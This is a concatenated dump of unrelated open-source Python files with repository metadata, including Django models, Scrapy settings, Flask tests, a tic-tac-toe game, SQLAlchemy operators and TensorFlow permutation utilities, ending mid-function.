def test_list_special_character(self):
testcase = MockTestCase()
list = [(testcase, "<error>")]
result_expected = [{"desc":"test","detail":"<error>"}]
result = self.tr._list(list)
self.assertEqual(result, result_expected)
class MockTestCase:
def shortDescription(self):
return "test"
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
[
"jblocksom@google.com@c3911fd6-fc52-0410-b77b-4923be2ec7be"
] |
jblocksom@google.com@c3911fd6-fc52-0410-b77b-4923be2ec7be
|
9a4d87b577fc8aa2eab994f8557c1a297f9c34b8
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/xdSKkXQkkMroNzq8C_19.py
|
66be33593f341b9f30351301eed1aa4976697558
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
"""
Create a function that counts how many D's are in a sentence.
### Examples
count_d("My friend Dylan got distracted in school.") ➞ 4
count_d("Debris was scattered all over the yard.") ➞ 3
count_d("The rodents hibernated in their den.") ➞ 3
### Notes
* Your function must be case-insensitive.
* Remember to `return` the result.
* Check the **Resources** for help.
"""
def count_d(sentence):
return sentence.lower().count("d")
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
026fc6d5be9907085f359fa45819c82d921fca1c
|
2726a4c9c5048033e75ce5f959b2716697199952
|
/allennlp/data/tokenizers/tokenizer.py
|
bd45512df3349b96124189700cd9aef2ba697c78
|
[
"Apache-2.0"
] |
permissive
|
DeNeutoy/allennlp
|
b42f2c92e3cefa489bb21f112c1bf3c922d645bd
|
ff78b093a088840d7e973f79567eec9e78269f53
|
refs/heads/master
| 2021-06-03T16:31:55.564568
| 2017-06-26T19:51:07
| 2017-06-26T19:51:07
| 95,490,219
| 0
| 0
| null | 2017-06-26T21:16:53
| 2017-06-26T21:16:53
| null |
UTF-8
|
Python
| false
| false
| 1,351
|
py
|
from typing import List
from ...common import Params
class Tokenizer:
"""
A ``Tokenizer`` splits strings of text into tokens. Typically, this either splits text into
word tokens or character tokens, and those are the two tokenizer subclasses we have implemented
here, though you could imagine wanting to do other kinds of tokenization for structured or
other inputs.
As part of tokenization, concrete implementations of this API will also handle stemming,
stopword filtering, adding start and end tokens, or other kinds of things you might want to do
to your tokens. See the parameters to, e.g., :class:`~.WordTokenizer`, or whichever tokenizer
you want to use.
If the base input to your model is words, you should use a :class:`~.WordTokenizer`, even if
you also want to have a character-level encoder to get an additional vector for each word
token. Splitting word tokens into character arrays is handled separately, in the
:class:`..token_representations.TokenRepresentation` class.
"""
def tokenize(self, text: str) -> List[str]:
"""
The only public method for this class. Actually implements splitting words into tokens.
"""
raise NotImplementedError
@classmethod
def from_params(cls, params: Params):
raise NotImplementedError
|
[
"markn@allenai.org"
] |
markn@allenai.org
|
d2dff76ec0c9bb41376698f4e3c34c73b9787c40
|
b4ea4c1bebf42c3f73cbc9a659ce1e2637584161
|
/Extract/poetryorg/poetryorg/settings.py
|
0388fb94051865d56f29fc70ccbd91b274b9805c
|
[] |
no_license
|
huiruru/FinalProject
|
436f9fccc68f7d9d62433cdc8d87df6020c73897
|
faa8732dfa2d26671c1a2e7effc034a74b83e327
|
refs/heads/master
| 2020-03-30T21:04:23.293356
| 2015-11-12T21:20:53
| 2015-11-12T21:20:53
| 42,456,456
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,436
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for poetryorg project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'poetryorg'
SPIDER_MODULES = ['poetryorg.spiders']
NEWSPIDER_MODULE = 'poetryorg.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY=0.25
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'poetryorg.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'poetryorg.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'poetryorg.pipelines.SomePipeline': 300,
#}
ITEM_PIPELINES = { # declare the handle sequence
'poetryorg.pipelines.PoetPipeline':100,
'poetryorg.pipelines.PoemPipeline':200,
}
MONGODB_SERVER = "localhost"
MONGODB_PORT = 27017
MONGODB_DB = "POETRY" # db name
MONGODB_POET_COLLECTION = "POET" # collection name
MONGODB_POEM_COLLECTION = "POEM"
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
# DUPEFILTER_CLASS = 'scrapy.dupefilter.RFPDupeFilter'
|
[
"huiru.ru@gmail.com"
] |
huiru.ru@gmail.com
|
5534bee8c302e6770c1dbaf714f392f7bdadf523
|
c3a5e5b4c7e8fde13737636af2f375e7a25db470
|
/mysite/test.py
|
6b48dea5a1d10906a5fcfa561d6193eb3ef77fe6
|
[] |
no_license
|
dhouse1UNCC/ITSC3155_FALL2020_DHOUSE1
|
cd5efc42b31f82eab43d6ddb60bb8572c3134efb
|
98c42068c9ba52370f7378d391687d02458b220d
|
refs/heads/master
| 2023-01-12T02:22:28.880424
| 2020-11-19T17:25:07
| 2020-11-19T17:25:07
| 295,801,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,399
|
py
|
import unittest
import requests
class FlaskTest(unittest.TestCase):
def test_index(self):
response = requests.get("http://danhouse98.pythonanywhere.com/index")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('<h2>Use this site to maintain and organize your notes.</h2>' in response.text, True)
def test_notes(self):
response = requests.get("http://danhouse98.pythonanywhere.com/notes")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('Title' and 'Date' in response.text, True)
def test_note(self):
response = requests.get("http://danhouse98.pythonanywhere.com/notes/1")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('First Note' in response.text, True)
def test_new(self):
response = requests.get("http://danhouse98.pythonanywhere.com/notes/new")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('<form action="new" method="post">' in response.text, True)
def test_delete(self):
response = requests.get('http://danhouse98.pythonanywhere.com/notes/delete')
statuscode = response.status_code
self.assertEqual(statuscode, 500)
if __name__ == " __main__":
unittest.main()
|
[
"dhouse1@uncc.edu"
] |
dhouse1@uncc.edu
|
19ac9c3055342b36fff5234d3553ffd56acd205a
|
cac090af84fae158a9e4c62a384578ba30b93c15
|
/final_project/manage.py
|
8826782e235fc8adbcf4ca7bbf53111ab924b33c
|
[] |
no_license
|
micnem/developers_institute
|
ed316a3754dd48ed54741387430ff1dd436ae1d9
|
aea6154a896407336c665d4ad531f124078bc001
|
refs/heads/main
| 2023-02-06T00:53:41.078983
| 2020-12-31T14:04:07
| 2020-12-31T14:04:07
| 305,331,313
| 0
| 0
| null | 2020-10-22T11:18:21
| 2020-10-19T09:29:00
|
CSS
|
UTF-8
|
Python
| false
| false
| 664
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'splatify.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"michael.nemni@gmail.com"
] |
michael.nemni@gmail.com
|
eb7595a1ce2bbcb06c7b3e803921fbbf8d610f6f
|
2cee317ce3403399da3788428e9d724608a5a623
|
/168. Excel Sheet Column Title.py
|
58129718c9c248ad4c1649e50f7e59ea449fe2c7
|
[] |
no_license
|
justin76tan/LiCode
|
17d6ac6bb8daa47a48e9ee9ed733db6c82b8d0a5
|
13a5b291f706b0d9c4d0497186414224b4831c92
|
refs/heads/master
| 2021-09-23T17:44:40.135236
| 2018-09-26T01:00:24
| 2018-09-26T01:00:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 770
|
py
|
'''
Given a positive integer, return its corresponding column title as appear in an Excel sheet.
For example:
1 -> A
2 -> B
3 -> C
...
26 -> Z
27 -> AA
28 -> AB
...
Example 1:
Input: 1
Output: "A"
Example 2:
Input: 28
Output: "AB"
Example 3:
Input: 701
Output: "ZY"
'''
class Solution:
def convertToTitle(self, n):
"""
:type n: int
:rtype: str
"""
result = ""
while n > 0:
mod = n % 26
tmp = n // 26
if mod == 0:
mod = 26
tmp -= 1
result += chr(mod + 64) # 26 + 64
n = tmp
return result[::-1]
if __name__ == '__main__':
s = Solution()
print(s.convertToTitle(703))
|
[
"huanglili622@126.com"
] |
huanglili622@126.com
|
0fd705b4ef0964c77722152c7b5141489ffcc5a0
|
1927c781959ee9f2cc05736883b50031a3f045e1
|
/tests/__init__.py
|
567be9aceecef596ffc3e1f68d839702cba9cad6
|
[
"MIT"
] |
permissive
|
Rockbag/lenah
|
7fd7a9a1b39c158f9487eb3c21492d676e01bd05
|
820b5f8bc4f640e02fc5c15e27a5cac1dad1c788
|
refs/heads/master
| 2023-08-24T20:17:21.411859
| 2021-10-03T16:22:24
| 2021-10-03T17:34:38
| 413,131,369
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35
|
py
|
"""Unit test package for lenah."""
|
[
"balint.biro@conjura.com"
] |
balint.biro@conjura.com
|
96ad32fb43ddee22b55db2eb5af36cf2ba241e5f
|
33836016ea99776d31f7ad8f2140c39f7b43b5fe
|
/fip_collab/2016_06_10_polycrystal_FIP/plot_pc_map.py
|
b8e3ff767257cc2bd9086820e2761f0eb34a6194
|
[] |
no_license
|
earthexploration/MKS-Experimentation
|
92a2aea83e041bfe741048d662d28ff593077551
|
9b9ff3b468767b235e7c4884b0ed56c127328a5f
|
refs/heads/master
| 2023-03-17T23:11:11.313693
| 2017-04-24T19:24:35
| 2017-04-24T19:24:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,543
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from constants import const
import h5py
import sys
def pltmap(ns_set, set_id_set, pcA, pcB):
plt.figure(num=3, figsize=[9, 7])
# colormat = np.random.rand(len(set_id_set), 3)
colormat = np.array([[.3, .3, 1.],
[.3, 1., .3],
[1., .2, .2],
[0., .7, .7],
[.7, .0, .7],
[.7, .7, .0],
[.5, .3, .1],
[.3, .5, .1],
[.1, .3, .5]])
f_red = h5py.File("spatial_reduced.hdf5", 'r')
for ii in xrange(len(set_id_set)):
reduced = f_red.get('reduced_%s' % set_id_set[ii])[...]
plt.plot(reduced[:, pcA], reduced[:, pcB],
marker='o', markersize=7, color=colormat[ii, :],
linestyle='', label=set_id_set[ii])
plt.plot(reduced[:, pcA].mean(), reduced[:, pcB].mean(),
marker='D', markersize=8, color=colormat[ii, :],
linestyle='')
plt.title("SVE sets in PC space")
plt.xlabel("PC%s" % str(pcA+1))
plt.ylabel("PC%s" % str(pcB+1))
plt.legend(loc='upper right', shadow=True, fontsize='medium')
plt.tight_layout()
f_red.close()
if __name__ == '__main__':
C = const()
ns_set = C['ns_val']
set_id_set = C['set_id_val']
pcA = np.int64(sys.argv[1])
pcB = np.int64(sys.argv[2])
pltmap(ns_set, set_id_set, pcA, pcB)
plt.show()
|
[
"noahhpaulson@gmail.com"
] |
noahhpaulson@gmail.com
|
c251ff0678398821b82b459cf48451a08382223d
|
954e46a8aa59bf75a3c6b8c6cf1c1807e8602349
|
/01-try-feature-extraction/07-try-feauter-selection-variance-threshold.py
|
00658ea70d1a1653bf54be6f1b78c58c1145f3c1
|
[] |
no_license
|
jiujue/try-machine-learn
|
d79b16dcfa90f046a3b27dcb3fe8a5b3f8c3bdde
|
d186c3b1bef20ddc3d382051b1967fd100baacf6
|
refs/heads/master
| 2020-08-22T06:57:36.394235
| 2019-10-20T10:08:41
| 2019-10-20T10:15:18
| 216,341,764
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
from sklearn.feature_selection import VarianceThreshold
def var():
'''
variance threshold
:return: None
'''
var = VarianceThreshold(threshold=0.0)
data = var.fit_transform([[22, 23, 24], [23, 84, 12], [22, 74, 54]])
print(data)
var = VarianceThreshold(threshold=0.1)
data = var.fit_transform([[22,23,24],[23,84,12],[22,74,54],
[22,23,24],[22,84,12],[22,74,54],
[22,23,24],[22,84,12],[22,74,54]])
print(data)
if __name__ == '__main__':
var()
|
[
"2936435008@qq.com"
] |
2936435008@qq.com
|
48c1440f24f30794e4ca0e28ad22520598eb47f3
|
2434dac4211887bd0a3eb0f729a8c52d60c55922
|
/sessions/tictactoe/board188v1
|
84f19577b674cfcfbc894841d3192613ee1a5d91
|
[] |
no_license
|
yaminikanthch/Python-Work
|
f9c4bef85ec80acd938e53e38414c4d99d19e2c9
|
f1ba24b6d98141d5ce9807dfb9185081916785b0
|
refs/heads/master
| 2021-09-01T13:28:42.904951
| 2017-12-27T07:06:16
| 2017-12-27T07:06:16
| 115,494,761
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,068
|
#!/usr/bin/python
import sys
import os
def won(player):
cleanBoard(pos)
print "Player %s won the game!" %(player)
sys.exit()
def draw_game(dg):
cleanBoard(pos)
print "The game is a tie break!"
sys.exit()
def cleanBoard(sel):
print "\n"
print " %s | %s | %s " %(sel[0],sel[1],sel[2])
print "............."
print " %s | %s | %s " %(sel[3],sel[4],sel[5])
print "............."
print " %s | %s | %s " %(sel[6],sel[7],sel[8])
print "\n"
def winCheck(win):
if win[0]=='X' and win[1]=='X' and win[2]=='X':
#won("X")
#Board should be displayed
#Game Over, Press 1 to restart
#sys.exit()
return 'X'
elif win[3]==win[4]==win[5]=='X':
return 'X'
elif win[6]==win[7]==win[8]=='X':
return 'X'
elif win[0]==win[3]==win[6]=='X':
return 'X'
elif win[1]==win[4]==win[7]=='X':
return 'X'
elif win[2]==win[5]==win[8]=='X':
return 'X'
elif win[0]==win[4]==win[8]=='X':
return 'X'
elif win[2]==win[4]==win[6]=='X':
return 'X'
elif ((win[3]==win[4]==win[5]=='O') or (win[6]==win[7]==win[8]=='O') or (win[0]==win[3]==win[6]=='O') or (win[1]==win[4]==win[7]=='O') or (win[2]==win[5]==win[8]=='O') or (win[0]==win[4]==win[8]=='O') or (win[2]==win[4]==win[6]=='O') or (win[0]=='O' and win[1]=='O' and win[2]=='O')):
return 'O'
return False
def chooseTurn(player):
print "This is player %s turn " %(player)
if player == 'X':
player = 'O'
else:
player = 'X'
return player
pos = [" "," "," "," "," "," "," "," "," "]
pturn='X'
turn=0
while True:
cleanBoard(pos)
n_player = chooseTurn(pturn)
userinput = int(raw_input("Enter you choice in the range of 1-9 : "))
if userinput > 0 and userinput < 10:
t=userinput-1
if pos[t] == " ":
pos[t] = pturn
pturn = n_player
turn=turn+1
os.system('clear')
if turn==9:
draw_game(turn)
val=winCheck(pos)
if val=='X':
won(val)
elif val=='O':
won(val)
else:
os.system('clear')
print "Position alreay in use, choose another one"
else:
os.system('clear')
print "Invalid number!, please enter numbers in the range 1 to 9\n\n"
|
[
"yaminikanthch@gmail.com"
] |
yaminikanthch@gmail.com
|
|
a86dfe6fe07f66f35150fcd97337fced70d7b4dc
|
3895bb91c9d04b249ec08e3fb9015ca13865ea86
|
/book_outlet/models.py
|
85effa70be33177445109d2baeef70448a9e5075
|
[] |
no_license
|
Aaryan8751/Django_Working_With_Models
|
377af3f378461a5bcfdb02b2912cf5c4ab9190ad
|
2c72c8daf0525cc45eef4777d7052287ae56ccaf
|
refs/heads/main
| 2023-06-14T00:16:49.200095
| 2021-07-04T13:52:32
| 2021-07-04T13:52:32
| 382,821,143
| 0
| 0
| null | 2021-07-04T13:52:33
| 2021-07-04T10:17:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,837
|
py
|
from django.db import models
from django.db.models.base import Model
from django.core.validators import MinLengthValidator, MaxLengthValidator
from django.db.models.deletion import CASCADE
from django.db.models.fields.related import ForeignKey
from django.urls import reverse
from django.utils.text import slugify
# Create your models here.
class Country(models.Model):
name = models.CharField(max_length=80)
code = models.CharField(max_length=2)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "Countries"
class Address(models.Model):
street = models.CharField(max_length=80)
postal_code = models.CharField(max_length=5)
city = models.CharField(max_length=50)
def __str__(self):
return f"{self.street}, {self.postal_code}, {self.city}"
class Meta:
verbose_name_plural = "Address Entries"
class Author(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
address = models.OneToOneField(Address,on_delete=models.CASCADE,null=True)
def full_name(self):
return f"{self.first_name} {self.last_name}"
def __str__(self):
return self.full_name()
class Book(models.Model):
title = models.CharField(max_length=50)
rating = models.IntegerField()
author = models.ForeignKey(Author,on_delete=models.CASCADE,null=True,related_name="books")
is_bestselling = models.BooleanField(default=False)
slug = models.SlugField(default="",blank=True,null=False,db_index=True) #harry-potter-1
published_countries = models.ManyToManyField(Country)
def get_absolute_url(self):
return reverse("book-detail", args=[self.slug])
def __str__(self):
return f"{self.title},{self.author},({self.rating}),{self.is_bestselling}"
|
[
"60098288+Aaryan8751@users.noreply.github.com"
] |
60098288+Aaryan8751@users.noreply.github.com
|
4fa9ce1aad6ca26d797aa1901cf0cc04ee1027c2
|
ea4e3ac0966fe7b69f42eaa5a32980caa2248957
|
/download/unzip/pyobjc/pyobjc-14/pyobjc/stable/pyobjc-core/Tools/Signatures/setup.py
|
f1adc0b7e5b2310c7042f32969605f7568eecab4
|
[
"MIT"
] |
permissive
|
hyl946/opensource_apple
|
36b49deda8b2f241437ed45113d624ad45aa6d5f
|
e0f41fa0d9d535d57bfe56a264b4b27b8f93d86a
|
refs/heads/master
| 2023-02-26T16:27:25.343636
| 2020-03-29T08:50:45
| 2020-03-29T08:50:45
| 249,169,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
from distutils.core import setup
import py2app
import glob
plist = dict(
CFBundleShortVersionString='0.1',
#CFBundleIconFile='EggShell.icns',
CFBundleGetInfoString='Signatures',
CFBundleIdentifier='net.sf.pyobjc.signatures',
CFBundleName='Signatures',
)
setup(
app=["main.py"],
data_files=["MainMenu.nib", "tools.py" ],
options=dict(py2app=dict(plist=plist)),
)
|
[
"hyl946@163.com"
] |
hyl946@163.com
|
df34ee40adc9a2b88f56bdbbeeb374d54ec7f417
|
b77dc17ee7ebad73e1028381739e01f708fb6c8b
|
/sqlalchemy/sql/operators.py
|
0047d1c732e66a89e1afa3284fe90cdef801e721
|
[] |
no_license
|
typerlc/ankice-deps
|
6c97bee1a926fc539b2f2e8ec345244e6188c6f1
|
4267af31c56ff2f51be65cad345fc7100ec53e78
|
refs/heads/master
| 2016-09-01T21:43:41.904988
| 2009-06-24T15:15:12
| 2009-06-24T15:15:12
| 235,231
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,221
|
py
|
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Defines operators used in SQL expressions."""
from operator import and_, or_, inv, add, mul, sub, div, mod, truediv, \
lt, le, ne, gt, ge, eq
from sqlalchemy.util import Set, symbol
def from_():
raise NotImplementedError()
def as_():
raise NotImplementedError()
def exists():
raise NotImplementedError()
def is_():
raise NotImplementedError()
def isnot():
raise NotImplementedError()
def op(a, opstring, b):
return a.op(opstring)(b)
def like_op(a, b, escape=None):
return a.like(b, escape=escape)
def notlike_op(a, b, escape=None):
raise NotImplementedError()
def ilike_op(a, b, escape=None):
return a.ilike(b, escape=escape)
def notilike_op(a, b, escape=None):
raise NotImplementedError()
def between_op(a, b, c):
return a.between(b, c)
def in_op(a, b):
return a.in_(*b)
def notin_op(a, b):
raise NotImplementedError()
def distinct_op(a):
return a.distinct()
def startswith_op(a, b, escape=None):
return a.startswith(b, escape=escape)
def endswith_op(a, b, escape=None):
return a.endswith(b, escape=escape)
def contains_op(a, b, escape=None):
return a.contains(b, escape=escape)
def comma_op(a, b):
raise NotImplementedError()
def concat_op(a, b):
return a.concat(b)
def desc_op(a):
return a.desc()
def asc_op(a):
return a.asc()
_commutative = Set([eq, ne, add, mul])
def is_commutative(op):
return op in _commutative
_smallest = symbol('_smallest')
_largest = symbol('_largest')
_PRECEDENCE = {
from_:15,
mul:7,
div:7,
mod:7,
add:6,
sub:6,
concat_op:6,
ilike_op:5,
notilike_op:5,
like_op:5,
notlike_op:5,
in_op:5,
notin_op:5,
is_:5,
isnot:5,
eq:5,
ne:5,
gt:5,
lt:5,
ge:5,
le:5,
between_op:5,
distinct_op:5,
inv:5,
and_:3,
or_:2,
comma_op:-1,
as_:-1,
exists:0,
_smallest: -1000,
_largest: 1000
}
def is_precedent(operator, against):
return _PRECEDENCE.get(operator, _PRECEDENCE[_smallest]) <= _PRECEDENCE.get(against, _PRECEDENCE[_largest])
|
[
"richardc@pippin.(none)"
] |
richardc@pippin.(none)
|
f11e2d660314492bce89f350ca42c8613614baba
|
bd5683b3857ea44a231b9d70a6986da554061850
|
/voi/permutation_utils.py
|
6facbbfa7a4a3a9e65d8ac4460f2d7e930ded5b4
|
[] |
no_license
|
anonymouscode115/autoregressive_inference
|
791ee18865cdac2c7cb47bf5584c0c145039d0d5
|
14860f55a5fd073145e8e063027ecdfb31feecd4
|
refs/heads/master
| 2023-08-18T22:20:43.338728
| 2021-10-25T06:49:17
| 2021-10-25T06:49:17
| 300,373,798
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,822
|
py
|
import tensorflow as tf
# @tf.function(input_signature=[
# tf.TensorSpec(shape=[None, None, None, None], dtype=tf.float32)])
def permutation_to_pointer(permutation):
"""Converts a permutation matrix to the label distribution of
a pointer network for training a language model
Arguments:
permutation: tf.Tensor
a permutation matrix that defines the order in which
words are inserted by the language model
Returns:
pointer: tf.Tensor
a ternary matrix that contains relative positions of words
inserted by a language model non-sequentially"""
# make sure the permutation is an int or the below computation
# does not make sense
permutation = tf.cast(permutation, tf.int32)
n = tf.shape(permutation)[-1]
# this first section will convert the one-hot style indexing to
# a ternary indexing where -1 means insert to the right of
# and 1 means insert to the left of word x
unsorted_relative = -tf.math.cumsum(
permutation, axis=-1, exclusive=True) + tf.math.cumsum(
permutation, axis=-1, exclusive=True, reverse=True)
# sort the relative positions into the decoding order induced
# by the permutation
sorted_relative = tf.matmul(
permutation, unsorted_relative, transpose_b=True)
# get the one hot distribution of pointer labels; should contain
# a sparse lower triangular matrix
sorted_ptr = tf.cast(tf.reduce_sum(tf.maximum(
0, tf.linalg.band_part(sorted_relative, 0, -1)), axis=-2), tf.int32)
# the variable sorted_ptr is in sorted partial positions but the pointer
# network reuses state and does not sort as decoding progresses
# so we need to convert into unsorted ptr positions
partial_pos = tf.repeat(
sorted_relative[..., tf.newaxis, :, :], n, axis=-3)
partial_pos = tf.linalg.band_part(
tf.transpose(partial_pos, [0, 1, 4, 3, 2]), 0, -1)
partial_pos = tf.linalg.band_part(
tf.transpose(partial_pos, [0, 1, 3, 2, 4]), 0, -1)
partial_pos = tf.cast(tf.reduce_sum(tf.maximum(
0, tf.transpose(partial_pos, [0, 1, 4, 2, 3])), axis=-2), tf.int32)
# lookup the sorted positions in a table of unsorted positions
unsorted_ptr = tf.argmin(tf.abs(sorted_ptr[
..., tf.newaxis] - 1 - partial_pos), axis=-1, output_type=tf.int32)
# the start token is never inserted so we can slice out the first channel
# in addition there are only n - 1 valid insertion locations
return tf.one_hot(unsorted_ptr[..., 1:], n - 1), partial_pos[:, :, :-1, :-1]
# @tf.function(input_signature=[
# tf.TensorSpec(shape=[None, None, None, None], dtype=tf.float32)])
def permutation_to_relative(permutation):
"""Converts a permutation matrix to a relative position
matrix for training a language model
Arguments:
permutation: tf.Tensor
a permutation matrix that defines the order in which
words are inserted by the language model
Returns:
relative: tf.Tensor
a ternary matrix that contains relative positions of words
inserted by a language model non-sequentially"""
# make sure the permutation is an int or the below computation
# does not make sense
permutation = tf.cast(permutation, tf.int32)
# this first section will convert the one-hot style indexing to
# a ternary indexing where -1 means insert to the right of
# and 1 means insert to the left of word x
unsorted_relative = -tf.math.cumsum(
permutation, axis=-1, exclusive=True) + tf.math.cumsum(
permutation, axis=-1, exclusive=True, reverse=True)
# sort the relative positions into the decoding order induced
# by the permutation
sorted_relative = tf.matmul(
permutation, unsorted_relative, transpose_b=True)
# get the one hot distribution of relative positions; contains
# a one at location i when [left, center, right]_i
return tf.one_hot(sorted_relative[..., :-1, :-1] + 1, 3)
def pt_permutation_to_relative_l2r(s0, s1, n):
"""Converts a l2r permutation matrix to a relative position
matrix for training a language model; for permutation
transformer use only
Arguments:
s0: batch size
s1: sentence length
n: clip of position difference
Returns:
relative: tf.Tensor
a ternary matrix that contains relative positions of words
inserted by a language model non-sequentially"""
sorted_relative = tf.range(s1)[tf.newaxis, tf.newaxis, :]
sorted_relative = tf.tile(sorted_relative, [s0, s1, 1])
shift = tf.range(s1)[tf.newaxis, :, tf.newaxis]
sorted_relative = sorted_relative - shift
sorted_relative = tf.clip_by_value(sorted_relative, -n, n)
sorted_relative = tf.cast(sorted_relative, tf.int32)
# get the one hot distribution of relative positions; contains
# a one at location i when [left, center, right]_i
return tf.one_hot(sorted_relative + n,
tf.cast(2*n+1, tf.int32))
# @tf.function(input_signature=[
# tf.TensorSpec(shape=[None, None], dtype=tf.float32),
# tf.TensorSpec(shape=[None, None], dtype=tf.int32),
# tf.TensorSpec(shape=None, dtype=tf.string)])
def get_permutation(mask, words, order):
"""Construct a discrete permutation matrix for training a non sequential
autoregressive model using gradient descent
Arguments:
mask: tf.Tensor
a tensor containing zeros and ones which indicate which elements
of words are out of bounds
words: tf.Tensor
the batch of word ids that will be used to determine the
permutation when using rare or common
order: tf.Tensor
the autoregressive ordering to train Transformer-InDIGO using;
l2r, r2l, rare, or common
Returns:
permutation: tf.Tensor
a permutation matrix for training a non sequential autoregressive
model using gradient descent"""
# the dataset is not compiled with an ordering so one must
# be generated on the fly during training; only applies
# when using a pointer layer; note that the end token
# must always be last and start token must always be first
b, n = tf.shape(words)[0], tf.shape(words)[1]
if tf.equal(order, 'r2l'): # corresponds to right-to-left
length = tf.cast(tf.reduce_sum(mask, axis=1), tf.int32)
ind = tf.tile(tf.range(n - 1)[tf.newaxis], [b, 1])
ind = tf.reverse_sequence(ind, length - 2, seq_axis=1, batch_axis=0)
ind = tf.concat([tf.fill([b, 1], 0), 1 + ind], axis=1)
elif tf.equal(order, 'rare'): # corresponds to rare-first
upper_bound = tf.reduce_max(words, axis=1, keepdims=True) + 1
scores = tf.where(tf.equal(words, 0), -tf.ones_like(words), words)
scores = tf.where(tf.equal(words, 1), upper_bound, scores)
scores = tf.where(tf.equal(words, 2), upper_bound + 1, scores)
scores = tf.where(tf.equal(words, 3), tf.zeros_like(words), scores)
ind = tf.argsort(scores, direction='DESCENDING')
elif tf.equal(order, 'common'): # corresponds to common-first
upper_bound = tf.reduce_max(words, axis=1, keepdims=True) + 1
scores = tf.where(tf.equal(words, 0), upper_bound + 2, words)
scores = tf.where(tf.equal(words, 1), upper_bound, scores)
scores = tf.where(tf.equal(words, 2), tf.zeros_like(words), scores)
scores = tf.where(tf.equal(words, 3), upper_bound + 1, scores)
